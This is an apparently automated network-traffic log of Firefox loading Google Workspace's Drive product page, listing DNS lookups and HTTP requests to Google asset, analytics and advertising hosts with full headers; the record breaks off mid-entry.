GET /qSRx0MPsSqwsxnB7oa8jkMwSmA03iQcMjrmJOnmNkA4o_mA2a9Q1II6moeBU7r1ztzOXQpLnKuMhIeFPmiP46hOw728K4Aw3JY4=e365-pa-nu-rw-w1455 HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

googlehosted.l.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

googlehosted.l.googleusercontent.com

IN A

Response

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
DNS

googlehosted.l.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

googlehosted.l.googleusercontent.com

IN A

Response

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
DNS

googlehosted.l.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

googlehosted.l.googleusercontent.com

IN AAAA

Response

googlehosted.l.googleusercontent.com

IN AAAA

2a00:1450:4009:823::2001
DNS

googlehosted.l.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

googlehosted.l.googleusercontent.com

IN AAAA

Response

googlehosted.l.googleusercontent.com

IN AAAA

2a00:1450:4009:823::2001
DNS

storage.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN A

Response

storage.googleapis.com

IN A

142.250.200.27

storage.googleapis.com

IN A

172.217.169.27

storage.googleapis.com

IN A

142.250.200.59

storage.googleapis.com

IN A

172.217.169.91

storage.googleapis.com

IN A

216.58.212.251

storage.googleapis.com

IN A

142.250.179.251

storage.googleapis.com

IN A

216.58.201.123

storage.googleapis.com

IN A

142.250.187.219

storage.googleapis.com

IN A

172.217.16.251

storage.googleapis.com

IN A

216.58.213.27

storage.googleapis.com

IN A

216.58.204.91

storage.googleapis.com

IN A

142.250.180.27

storage.googleapis.com

IN A

142.250.187.251

storage.googleapis.com

IN A

142.250.178.27

storage.googleapis.com

IN A

216.58.212.219
DNS

storage.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN A

Response

storage.googleapis.com

IN A

216.58.212.251

storage.googleapis.com

IN A

216.58.212.219

storage.googleapis.com

IN A

172.217.169.27

storage.googleapis.com

IN A

142.250.178.27

storage.googleapis.com

IN A

142.250.179.251

storage.googleapis.com

IN A

142.250.200.59

storage.googleapis.com

IN A

142.250.187.219

storage.googleapis.com

IN A

172.217.169.91

storage.googleapis.com

IN A

142.250.200.27

storage.googleapis.com

IN A

216.58.204.91

storage.googleapis.com

IN A

172.217.16.251

storage.googleapis.com

IN A

142.250.187.251

storage.googleapis.com

IN A

216.58.213.27

storage.googleapis.com

IN A

142.250.180.27

storage.googleapis.com

IN A

216.58.201.123
GET

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg

firefox.exe

Remote address:

142.250.200.27:443

Request

GET /assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg HTTP/2.0
host: storage.googleapis.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg

firefox.exe

Remote address:

142.250.200.27:443

Request

GET /assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg HTTP/2.0
host: storage.googleapis.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

storage.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN AAAA

Response

storage.googleapis.com

IN AAAA

2a00:1450:4009:81d::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:81e::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:820::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:81f::201b
DNS

storage.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN AAAA

Response

storage.googleapis.com

IN AAAA

2a00:1450:4009:81d::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:81f::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:81e::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:820::201b
DNS

ssl.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.google-analytics.com

IN A

Response

ssl.google-analytics.com

IN A

142.250.178.8
DNS

ssl.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.google-analytics.com

IN A

Response

ssl.google-analytics.com

IN A

142.250.187.232
GET

https://ssl.google-analytics.com/ga.js

firefox.exe

Remote address:

142.250.178.8:443

Request

GET /ga.js HTTP/2.0
host: ssl.google-analytics.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://ssl.google-analytics.com/r/__utm.gif?utmwv=5.7.2&utms=1&utmn=212438136&utmhn=workspace.google.com&utme=8(Region*Language*Original%20URL*Country*14!uaRef)9(noram*en*workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F*us*14!val%3A)11(2*2*4!2)&utmcs=UTF-8&utmsr=1280x720&utmvp=1280x539&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&utmhid=1275141953&utmr=-&utmp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F%3Fchannel%3D%26e%3D&utmht=1736791490218&utmac=UA-18073-1&utmgtm=45He5190n51Q4J6v595350za200&utmcc=__utma%3D61317162.1516818363.1736791490.1736791490.1736791490.1%3B%2B__utmz%3D61317162.1736791490.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&aip=1&utmjid=2007399367&utmredir=1&utmmt=1&utmu=q_CgACBAAAGBAAAAAgAAAAAE~

firefox.exe

Remote address:

142.250.178.8:443

Request

GET /r/__utm.gif?utmwv=5.7.2&utms=1&utmn=212438136&utmhn=workspace.google.com&utme=8(Region*Language*Original%20URL*Country*14!uaRef)9(noram*en*workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F*us*14!val%3A)11(2*2*4!2)&utmcs=UTF-8&utmsr=1280x720&utmvp=1280x539&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&utmhid=1275141953&utmr=-&utmp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F%3Fchannel%3D%26e%3D&utmht=1736791490218&utmac=UA-18073-1&utmgtm=45He5190n51Q4J6v595350za200&utmcc=__utma%3D61317162.1516818363.1736791490.1736791490.1736791490.1%3B%2B__utmz%3D61317162.1736791490.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&aip=1&utmjid=2007399367&utmredir=1&utmmt=1&utmu=q_CgACBAAAGBAAAAAgAAAAAE~ HTTP/2.0
host: ssl.google-analytics.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

ssl.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.google-analytics.com

IN AAAA

Response

ssl.google-analytics.com

IN AAAA

2a00:1450:4009:81e::2008
DNS

ssl.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.google-analytics.com

IN AAAA

Response

ssl.google-analytics.com

IN AAAA

2a00:1450:4009:81e::2008
DNS

region1.analytics.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

region1.analytics.google.com

IN A

Response

region1.analytics.google.com

IN A

216.239.34.36

region1.analytics.google.com

IN A

216.239.32.36
DNS

region1.analytics.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

region1.analytics.google.com

IN A

Response

region1.analytics.google.com

IN A

216.239.34.36

region1.analytics.google.com

IN A

216.239.32.36
DNS

stats.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

stats.g.doubleclick.net

IN A

Response

stats.g.doubleclick.net

IN A

64.233.184.157

stats.g.doubleclick.net

IN A

64.233.184.155

stats.g.doubleclick.net

IN A

64.233.184.156

stats.g.doubleclick.net

IN A

64.233.184.154
DNS

stats.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

stats.g.doubleclick.net

IN A

Response

stats.g.doubleclick.net

IN A

64.233.184.157

stats.g.doubleclick.net

IN A

64.233.184.156

stats.g.doubleclick.net

IN A

64.233.184.154

stats.g.doubleclick.net

IN A

64.233.184.155
DNS

www.google.co.uk

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.co.uk

IN A

Response

www.google.co.uk

IN A

172.217.169.3
DNS

www.google.co.uk

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.co.uk

IN A

Response

www.google.co.uk

IN A

172.217.169.3
POST

https://region1.analytics.google.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736791489487&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=1008019222.1736791490&sr=1280x720&_ng=1&ir=1&frm=0&pscdl=noapi&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736791490&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x672&ep.is_rivendell=true&tfd=1100

firefox.exe

Remote address:

216.239.34.36:443

Request

POST /g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736791489487&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=1008019222.1736791490&sr=1280x720&_ng=1&ir=1&frm=0&pscdl=noapi&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736791490&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x672&ep.is_rivendell=true&tfd=1100 HTTP/2.0
host: region1.analytics.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
origin: https://workspace.google.com
cookie: NID=520=dGwT782ItQw7wAIUO2p_w_9WIf5CQencZTI5F1U5fs1a6Mt5610ietS-xRqf9mULDiTEI8hZttYA_SemYb4yue3MshhY9pSCPpQ2MTrgud5I3ez6RiaaCcKM6_kAEZRIx2I4aNtZLMysVIPCuipMGCT36x73Z2JL8xaKGqTIjtCZ55Sp1MhYPQqndg
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: same-site
pragma: no-cache
cache-control: no-cache
content-length: 0
te: trailers
GET

https://www.google.co.uk/ads/ga-audiences?v=1&t=sr&slf_rd=1&_r=4&_ng=1&tid=G-FWCBRW1RY8&cid=1008019222.1736791490&gtm=45je5190v886057375z8595350za200zb595350&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&tag_exp=101925629~102067555~102067808~102081485~102198178&z=986229174

firefox.exe

Remote address:

172.217.169.3:443

Request

GET /ads/ga-audiences?v=1&t=sr&slf_rd=1&_r=4&_ng=1&tid=G-FWCBRW1RY8&cid=1008019222.1736791490&gtm=45je5190v886057375z8595350za200zb595350&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&tag_exp=101925629~102067555~102067808~102081485~102198178&z=986229174 HTTP/2.0
host: www.google.co.uk
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
POST

https://stats.g.doubleclick.net/g/collect?v=2&_ng=1&tid=G-FWCBRW1RY8&cid=1008019222.1736791490&gtm=45je5190v886057375z8595350za200zb595350&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178

firefox.exe

Remote address:

64.233.184.157:443

Request

POST /g/collect?v=2&_ng=1&tid=G-FWCBRW1RY8&cid=1008019222.1736791490&gtm=45je5190v886057375z8595350za200zb595350&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178 HTTP/2.0
host: stats.g.doubleclick.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://workspace.google.com
referer: https://workspace.google.com/
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
content-length: 0
te: trailers
POST

https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-18073-34&cid=1008019222.1736791490&jid=154731914&gjid=1025540979&_gid=1663413137.1736791490&_u=YCDAiEABDAAAAGgBI~&z=2028604563

firefox.exe

Remote address:

64.233.184.157:443

Request

POST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-18073-34&cid=1008019222.1736791490&jid=154731914&gjid=1025540979&_gid=1663413137.1736791490&_u=YCDAiEABDAAAAGgBI~&z=2028604563 HTTP/2.0
host: stats.g.doubleclick.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
content-length: 0
origin: https://workspace.google.com
referer: https://workspace.google.com/
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
DNS

region1.analytics.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

region1.analytics.google.com

IN A

Response

region1.analytics.google.com

IN A

216.239.34.36

region1.analytics.google.com

IN A

216.239.32.36
DNS

region1.analytics.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

region1.analytics.google.com

IN A

Response

region1.analytics.google.com

IN A

216.239.34.36

region1.analytics.google.com

IN A

216.239.32.36
DNS

www.google.co.uk

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.co.uk

IN A

Response

www.google.co.uk

IN A

172.217.169.3
DNS

www.google.co.uk

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.co.uk

IN AAAA

Response

www.google.co.uk

IN AAAA

2a00:1450:4009:817::2003
DNS

www.google.co.uk

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.co.uk

IN AAAA

Response

www.google.co.uk

IN AAAA

2a00:1450:4009:817::2003
DNS

stats.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

stats.g.doubleclick.net

IN A

Response

stats.g.doubleclick.net

IN A

64.233.184.155

stats.g.doubleclick.net

IN A

64.233.184.157

stats.g.doubleclick.net

IN A

64.233.184.154

stats.g.doubleclick.net

IN A

64.233.184.156
DNS

stats.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

stats.g.doubleclick.net

IN A

Response

stats.g.doubleclick.net

IN A

64.233.184.157

stats.g.doubleclick.net

IN A

64.233.184.154

stats.g.doubleclick.net

IN A

64.233.184.155

stats.g.doubleclick.net

IN A

64.233.184.156
DNS

stats.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

stats.g.doubleclick.net

IN AAAA

Response

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9a

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9b

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9c

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9d
DNS

stats.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

stats.g.doubleclick.net

IN AAAA

Response

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9c

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9b

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9a

stats.g.doubleclick.net

IN AAAA

2a00:1450:400c:c0b::9d
DNS

region1.analytics.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

region1.analytics.google.com

IN AAAA

Response

region1.analytics.google.com

IN AAAA

2001:4860:4802:34::36

region1.analytics.google.com

IN AAAA

2001:4860:4802:32::36
DNS

region1.analytics.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

region1.analytics.google.com

IN AAAA

Response

region1.analytics.google.com

IN AAAA

2001:4860:4802:32::36

region1.analytics.google.com

IN AAAA

2001:4860:4802:34::36
DNS

apis.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.178.14
DNS

apis.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.178.14
GET

https://apis.google.com/js/client.js

firefox.exe

Remote address:

142.250.178.14:443

Request

GET /js/client.js HTTP/2.0
host: apis.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
cookie: NID=520=dGwT782ItQw7wAIUO2p_w_9WIf5CQencZTI5F1U5fs1a6Mt5610ietS-xRqf9mULDiTEI8hZttYA_SemYb4yue3MshhY9pSCPpQ2MTrgud5I3ez6RiaaCcKM6_kAEZRIx2I4aNtZLMysVIPCuipMGCT36x73Z2JL8xaKGqTIjtCZ55Sp1MhYPQqndg
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: same-site
te: trailers
DNS

plus.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

plus.l.google.com

IN A

Response

plus.l.google.com

IN A

142.250.178.14
DNS

plus.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

plus.l.google.com

IN A

Response

plus.l.google.com

IN A

142.250.178.14
DNS

plus.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

plus.l.google.com

IN AAAA

Response

plus.l.google.com

IN AAAA

2a00:1450:4009:815::200e
DNS

feedback-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

feedback-pa.clients6.google.com

IN A

Response

feedback-pa.clients6.google.com

IN A

142.250.200.42
DNS

42.200.250.142.in-addr.arpa

firefox.exe

Remote address:

8.8.8.8:53

Request

42.200.250.142.in-addr.arpa

IN PTR

Response

42.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f101e100net
DNS

ade.googlesyndication.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ade.googlesyndication.com

IN AAAA

Response
DNS

www3.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www3.l.google.com

IN A

Response

www3.l.google.com

IN A

142.250.178.14
DNS

www3.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www3.l.google.com

IN A

Response

www3.l.google.com

IN A

142.250.178.14
DNS

157.184.233.64.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

157.184.233.64.in-addr.arpa

IN PTR

Response

157.184.233.64.in-addr.arpa

IN PTR

wa-in-f1571e100net
DNS

feedback-pa.clients6.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

feedback-pa.clients6.google.com

IN AAAA

Response

feedback-pa.clients6.google.com

IN AAAA

2a00:1450:4009:817::200a
DNS

ade.googlesyndication.com

NetworkService

Remote address:

8.8.8.8:53

Request

ade.googlesyndication.com

IN A

Response

ade.googlesyndication.com

IN A

216.58.204.66
DNS

accounts.youtube.com

NetworkService

Remote address:

8.8.8.8:53

Request

accounts.youtube.com

IN A

Response

accounts.youtube.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.178.14
DNS

accounts.youtube.com

NetworkService

Remote address:

8.8.8.8:53

Request

accounts.youtube.com

IN A

Response

accounts.youtube.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.178.14
GET

https://feedback-pa.clients6.google.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__

firefox.exe

Remote address:

142.250.200.42:443

Request

GET /static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__ HTTP/2.0
host: feedback-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
cookie: NID=520=dGwT782ItQw7wAIUO2p_w_9WIf5CQencZTI5F1U5fs1a6Mt5610ietS-xRqf9mULDiTEI8hZttYA_SemYb4yue3MshhY9pSCPpQ2MTrgud5I3ez6RiaaCcKM6_kAEZRIx2I4aNtZLMysVIPCuipMGCT36x73Z2JL8xaKGqTIjtCZ55Sp1MhYPQqndg
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: same-site
te: trailers
GET

https://ade.googlesyndication.com/ddm/activity/src=2507573;type=googl003;cat=fl-gw008;ord=1;num=1900757085904;npa=0;pscdl=denied;frm=0;gtm=45fe5190v9181638614z8595350za201zb595350;gcs=G101;gcd=13q3r3l3l5l1;dma=0;tag_exp=101925629~102067555~102067808~102081485~102123607~102198178;epver=2;~oref=https%3A%2F%2Fworkspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F?

firefox.exe

Remote address:

216.58.204.66:443

Request

GET /ddm/activity/src=2507573;type=googl003;cat=fl-gw008;ord=1;num=1900757085904;npa=0;pscdl=denied;frm=0;gtm=45fe5190v9181638614z8595350za201zb595350;gcs=G101;gcd=13q3r3l3l5l1;dma=0;tag_exp=101925629~102067555~102067808~102081485~102123607~102198178;epver=2;~oref=https%3A%2F%2Fworkspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F? HTTP/2.0
host: ade.googlesyndication.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

www3.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

